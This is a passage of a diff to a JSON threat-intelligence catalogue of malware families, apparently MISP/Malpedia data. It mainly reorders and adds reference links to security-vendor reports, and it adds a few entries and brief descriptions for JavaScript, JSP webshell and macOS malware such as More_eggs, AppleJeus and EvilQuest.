+ "https://blog.trendmicro.com/trendlabs-security-intelligence/mirrorthief-group-uses-magecart-skimming-attack-to-hit-hundreds-of-campus-online-stores-in-us-and-canada/",
+ "https://community.riskiq.com/article/14924d61",
+ "https://blog.sucuri.net/2021/07/magecart-swiper-uses-unorthodox-concatenation.html",
+ "https://medium.com/reflectiz/csp-the-right-solution-for-the-web-skimming-pandemic-acb7a4414218",
+ "https://sansec.io/labs/2020/01/25/magecart-hackers-arrested/",
+ "https://maxkersten.nl/2020/01/20/ticket-resellers-infected-with-a-credit-card-skimmer/",
+ "https://securelist.com/apt-trends-report-q2-2019/91897/",
+ "https://blog.sucuri.net/2020/07/skimmers-in-images-github-repos.html",
+ "https://community.riskiq.com/article/fda1f967",
+ "https://sansec.io/research/north-korea-magecart",
+ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
+ "https://blog.malwarebytes.com/cybercrime/2019/04/github-hosted-magecart-skimmer-used-against-hundreds-of-e-commerce-sites/",
+ "https://blog.malwarebytes.com/threat-intelligence/2021/11/credit-card-skimmer-evades-virtual-machines/",
+ "https://blog.sucuri.net/2020/06/evasion-tactics-in-hybrid-credit-card-skimmers.html",
+ "https://geminiadvisory.io/magecart-google-tag-manager/",
+ "https://www.riskiq.com/blog/labs/magecart-medialand/",
+ "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/magecart-skimming-attack-targets-mobile-users-of-hotel-chain-booking-websites/",
+ "https://blog.malwarebytes.com/cybercrime/2021/05/newly-observed-php-based-skimmer-shows-ongoing-magecart-group-12-activity/",
+ "https://twitter.com/AffableKraut/status/1415425132080816133?s=20"
],
"synonyms": [],
"type": []
@@ -7790,30 +8261,33 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs",
- "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/",
- "https://blog.morphisec.com/cobalt-gang-2.0",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/",
- "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish",
- "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire",
+ "https://sec0wn.blogspot.com/2023/03/how-do-you-like-dem-eggs-i-like-mine.html?m=1",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf",
+ "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware",
"https://www.secureworks.com/research/threat-profiles/gold-kingswood",
"http://www.secureworks.com/research/threat-profiles/gold-kingswood",
+ "https://www.esentire.com/web-native-pages/unmasking-venom-spider",
"https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html",
- "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/",
- "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
- "https://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing",
- "https://attack.mitre.org/software/S0284/",
- "https://asert.arbornetworks.com/double-the-infection-double-the-fun/",
- "https://github.com/eset/malware-ioc/tree/master/evilnum",
"https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/",
- "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw",
"https://twitter.com/Arkbird_SOLG/status/1301536930069278727",
+ "https://mp.weixin.qq.com/s/REXBtbnI2zXj4H3u6ofMMw",
+ "https://attack.mitre.org/software/S0284/",
"https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers",
- "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/",
+ "https://asert.arbornetworks.com/double-the-infection-double-the-fun/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://github.com/eset/malware-ioc/tree/master/evilnum",
"https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware",
- "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf"
+ "https://securityintelligence.com/posts/itg08-aka-fin6-partners-with-trickbot-gang-uses-anchor-framework/",
+ "https://blog.morphisec.com/cobalt-gang-2.0",
+ "https://www.securonix.com/blog/threat-labs-security-advisory-new-ocxharvester-attack-campaign-leverages-modernized-more_eggs-suite/",
+ "https://securityintelligence.com/posts/more_eggs-anyone-threat-actor-itg08-strikes-again/",
+ "https://expel.com/blog/more-eggs-and-some-linkedin-resume-spearphishing",
+ "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/",
+ "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish",
+ "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire",
+ "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/"
],
"synonyms": [
"SKID",
@@ -7829,23 +8303,14 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.nanhaishu",
- "https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf",
- "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets",
"https://attack.mitre.org/software/S0228/",
- "https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering"
+ "https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering",
+ "https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf",
+ "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "7abd6950-7a07-4d9e-ade1-62414fa50619",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "3e46af39-52e8-442f-aff1-38eeb90336fc",
"value": "NanHaiShu"
},
@@ -7869,15 +8334,15 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.ostap",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
- "https://malfind.com/index.php/2021/11/24/from-the-archive-1-ostap-dropper-deobfuscation-and-analysis/",
- "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
"https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/",
- "https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/",
- "https://www.intrinsec.com/deobfuscating-hunting-ostap/",
+ "https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/",
"https://github.com/cryptogramfan/Malware-Analysis-Scripts/blob/master/deobfuscate_ostap.py",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
- "https://www.cert.pl/en/news/single/ostap-malware-analysis-backswap-dropper/"
+ "https://labs.bitdefender.com/2020/03/5-times-more-coronavirus-themed-malware-reports-during-march/?utm_campaign=twitter&utm_medium=twitter&utm_source=twitter",
+ "https://www.intrinsec.com/deobfuscating-hunting-ostap/",
+ "https://malfind.com/index.php/2021/11/24/from-the-archive-1-ostap-dropper-deobfuscation-and-analysis/",
+ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf",
+ "https://www.bromium.com/deobfuscating-ostap-trickbots-javascript-downloader/",
+ "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/"
],
"synonyms": [],
"type": []
@@ -7903,9 +8368,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.peacenotwar",
+ "https://www.vice.com/en/article/dypeek/open-source-sabotage-node-ipc-wipe-russia-belraus-computers",
"https://www.bleepingcomputer.com/news/security/big-sabotage-famous-npm-package-deletes-files-to-protest-ukraine-war/",
- "https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c",
- "https://www.vice.com/en/article/dypeek/open-source-sabotage-node-ipc-wipe-russia-belraus-computers"
+ "https://gist.github.com/MidSpike/f7ae3457420af78a54b38a31cc0c809c"
],
"synonyms": [],
"type": []
@@ -7959,12 +8424,12 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox",
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/attacker-tracking-users-seeking-pakistani-passport/",
- "http://resources.infosecinstitute.com/scanbox-framework/",
- "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
- "https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global",
+ "https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/",
"https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea",
"https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks",
- "https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/"
+ "https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global",
+ "http://resources.infosecinstitute.com/scanbox-framework/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk"
],
"synonyms": [],
"type": []
@@ -7977,9 +8442,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/"
+ "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf"
],
"synonyms": [],
"type": []
@@ -8018,9 +8483,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext",
- "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
"https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
- "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/"
+ "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/",
+ "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/"
],
"synonyms": [],
"type": []
@@ -8046,8 +8511,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_001",
- "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef",
- "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f"
+ "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f",
+ "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef"
],
"synonyms": [],
"type": []
@@ -8111,16 +8576,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.valak",
- "https://security-soup.net/analysis-of-valak-maldoc/",
- "https://unit42.paloaltonetworks.com/valak-evolution/",
- "https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7",
"https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/",
- "https://twitter.com/malware_traffic/status/1207824548021886977",
- "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
"https://unit42.paloaltonetworks.com/atoms/monsterlibra/",
- "https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/",
+ "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
+ "https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7",
"https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
- "https://threatresearch.ext.hp.com/detecting-ta551-domains/"
+ "https://unit42.paloaltonetworks.com/valak-evolution/",
+ "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
+ "https://security-soup.net/analysis-of-valak-maldoc/",
+ "https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/",
+ "https://twitter.com/malware_traffic/status/1207824548021886977"
],
"synonyms": [
"Valek"
@@ -8148,9 +8613,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell",
- "https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/",
+ "https://blog.gigamon.com/2022/09/28/investigating-web-shells/",
"https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/",
- "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/"
+ "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/",
+ "https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/"
],
"synonyms": [],
"type": []
@@ -8160,30 +8626,60 @@
},
{
"description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.3cx_backdoor",
+ "https://objective-see.org/blog/blog_0x73.html",
+ "https://objective-see.org/blog/blog_0x74.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d5e10bf9-9de8-46be-96d0-aa502b14ffe8",
+ "value": "3CX Backdoor (OS X)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.amos",
+ "https://blog.cyble.com/2023/04/26/threat-actor-selling-new-atomic-macos-amos-stealer-on-telegram/"
+ ],
+ "synonyms": [
+ "Atomic macOS Stealer"
+ ],
+ "type": []
+ },
+ "uuid": "2fa2be52-e44f-4998-bde7-c66cfb6f4521",
+ "value": "AMOS"
+ },
+ {
+ "description": "According to PcRisk AppleJeus is the name of backdoor malware that was distributed by the Lazarus group. They spread this malicious software through a fake app disguised as a cryptocurrency trading application called Celas Trade Pro.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://securelist.com/operation-applejeus-sequel/95596/",
- "https://objective-see.com/blog/blog_0x54.html",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a",
- "https://objective-see.com/blog/blog_0x49.html",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e",
- "https://objective-see.com/blog/blog_0x5F.html",
- "https://securelist.com/operation-applejeus/87553/",
- "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56",
+ "https://www.youtube.com/watch?v=1NkzTKkEM2k",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/",
+ "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56",
+ "https://objective-see.com/blog/blog_0x5F.html",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/",
+ "https://objective-see.com/blog/blog_0x54.html",
+ "https://objective-see.com/blog/blog_0x49.html",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c",
- "https://www.youtube.com/watch?v=1NkzTKkEM2k",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-048a",
- "https://www.youtube.com/watch?v=rjA0Vf75cYk",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b",
- "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/"
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-048a",
+ "https://securelist.com/operation-applejeus-sequel/95596/",
+ "https://securelist.com/operation-applejeus/87553/",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.youtube.com/watch?v=rjA0Vf75cYk"
],
"synonyms": [],
"type": []
@@ -8211,11 +8707,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.bundlore",
- "https://www.trendmicro.com/en_hk/research/21/f/nukesped-copies-fileless-code-from-bundlore--leaves-it-unused.html",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://blog.confiant.com/new-macos-bundlore-loader-analysis-ca16d19c058c",
+ "https://labs.sentinelone.com/resourceful-macos-malware-hides-in-named-fork/",
"https://twitter.com/ConfiantIntel/status/1393215825931288580?s=20",
- "https://labs.sentinelone.com/resourceful-macos-malware-hides-in-named-fork/"
+ "https://www.trendmicro.com/en_hk/research/21/f/nukesped-copies-fileless-code-from-bundlore--leaves-it-unused.html",
+ "https://blog.confiant.com/new-macos-bundlore-loader-analysis-ca16d19c058c",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf"
],
"synonyms": [
"SurfBuyer"
@@ -8260,8 +8756,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.cdds",
"https://www.sentinelone.com/labs/infect-if-needed-a-deeper-dive-into-targeted-backdoor-macos-macma/",
- "https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/",
- "https://objective-see.com/blog/blog_0x69.html"
+ "https://objective-see.com/blog/blog_0x69.html",
+ "https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/"
],
"synonyms": [
"Macma"
@@ -8276,9 +8772,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.choziosi",
- "https://redcanary.com/blog/chromeloader/",
- "https://www.th3protocol.com/2022/Choziosi-Loader",
"https://www.gdatasoftware.com/blog/2022/01/37236-qr-codes-on-twitter-deliver-malicious-chrome-extension",
+ "https://www.th3protocol.com/2022/Choziosi-Loader",
+ "https://blogs.blackberry.com/en/2022/11/chromeloader-infects-the-browser-by-loading-malicious-extension",
+ "https://redcanary.com/blog/chromeloader/",
"https://www.crowdstrike.com/blog/how-crowdstrike-uncovered-a-new-macos-browser-hijacking-campaign/"
],
"synonyms": [
@@ -8295,7 +8792,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.cloud_mensis",
- "https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/"
+ "https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/",
+ "https://twitter.com/ESETresearch/status/1575103839115804672"
],
"synonyms": [],
"type": []
@@ -8308,8 +8806,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief",
- "https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/",
- "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed"
+ "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed",
+ "https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/"
],
"synonyms": [],
"type": []
@@ -8322,8 +8820,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat",
- "https://objective-see.com/blog/blog_0x2A.html",
- "https://objectivebythesea.com/v2/talks/OBTS_v2_Seele.pdf"
+ "https://objectivebythesea.com/v2/talks/OBTS_v2_Seele.pdf",
+ "https://objective-see.com/blog/blog_0x2A.html"
],
"synonyms": [],
"type": []
@@ -8354,15 +8852,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "5bc62523-dc80-46b4-b5cb-9caf44c11552",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142",
"value": "CpuMeaner"
},
@@ -8371,9 +8860,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.creative_updater",
+ "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/",
"https://digitasecurity.com/blog/2018/02/05/creativeupdater/",
- "https://objective-see.com/blog/blog_0x29.html",
- "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/"
+ "https://objective-see.com/blog/blog_0x29.html"
],
"synonyms": [],
"type": []
@@ -8386,9 +8875,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis",
- "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines",
"https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?",
- "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html"
+ "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html",
+ "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines"
],
"synonyms": [],
"type": []
@@ -8414,17 +8903,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.dacls",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
"https://objective-see.com/blog/blog_0x57.html",
- "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability",
- "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/",
- "https://www.sygnia.co/mata-framework",
- "https://objective-see.com/blog/blog_0x5F.html",
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability",
+ "https://www.sygnia.co/mata-framework",
+ "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/",
+ "https://objective-see.com/blog/blog_0x5F.html",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
"https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/",
- "https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/"
+ "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
],
"synonyms": [],
"type": []
@@ -8442,15 +8931,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "34688253-fea5-4770-bf96-55f45077c347",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a8e71805-014d-4998-b21e-3125da800124",
"value": "DarthMiner"
},
@@ -8473,8 +8953,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.dockster",
- "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html",
- "https://www.f-secure.com/weblog/archives/00002466.html"
+ "https://www.f-secure.com/weblog/archives/00002466.html",
+ "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html"
],
"synonyms": [],
"type": []
@@ -8528,8 +9008,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilosx",
- "https://twitter.com/JohnLaTwC/status/966139336436498432",
- "https://github.com/Marten4n6/EvilOSX"
+ "https://github.com/Marten4n6/EvilOSX",
+ "https://twitter.com/JohnLaTwC/status/966139336436498432"
],
"synonyms": [],
"type": []
@@ -8538,20 +9018,20 @@
"value": "EvilOSX"
},
{
- "description": "",
+ "description": "According to PcRisk, EvilQuest (also known as ThiefQuest) is like many other malicious programs of this type - it encrypts files and creates a ransom message. In most cases, this type of malware modifies the names of encrypted files by appending certain extensions, however, this ransomware leaves them unchanged.\r\n\r\nIt drops the \"READ_ME_NOW.txt\" in each folder that contains encrypted data and displays another ransom message in a pop-up window. Additionally, this malware is capable of detecting if certain files are stored on the computer, operates as a keylogger, and receives commands from a Command & Control server.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilquest",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://objective-see.com/blog/blog_0x59.html",
- "https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/",
- "https://www.bleepingcomputer.com/news/security/evilquest-wiper-uses-ransomware-cover-to-steal-files-from-macs/",
- "https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/",
- "https://objective-see.com/blog/blog_0x5F.html",
- "https://github.com/gdbinit/evilquest_deobfuscator",
"https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities",
"https://twitter.com/dineshdina04/status/1277668001538433025",
- "https://www.sentinelone.com/labs/defeating-macos-malware-anti-analysis-tricks-with-radare2/"
+ "https://www.bleepingcomputer.com/news/security/evilquest-wiper-uses-ransomware-cover-to-steal-files-from-macs/",
+ "https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/",
+ "https://objective-see.com/blog/blog_0x59.html",
+ "https://github.com/gdbinit/evilquest_deobfuscator",
+ "https://www.sentinelone.com/labs/defeating-macos-malware-anti-analysis-tricks-with-radare2/",
+ "https://objective-see.com/blog/blog_0x5F.html",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/"
],
"synonyms": [
"ThiefQuest"
@@ -8579,12 +9059,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.finfisher",
+ "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/",
"https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/",
"https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/",
+ "https://objective-see.com/blog/blog_0x4F.html",
"https://securelist.com/finspy-unseen-findings/104322/",
- "https://objective-see.com/blog/blog_0x5F.html",
- "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/",
- "https://objective-see.com/blog/blog_0x4F.html"
+ "https://objective-see.com/blog/blog_0x5F.html"
],
"synonyms": [],
"type": []
@@ -8597,11 +9077,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities",
"https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed",
"http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html",
"https://en.wikipedia.org/wiki/Flashback_(Trojan)",
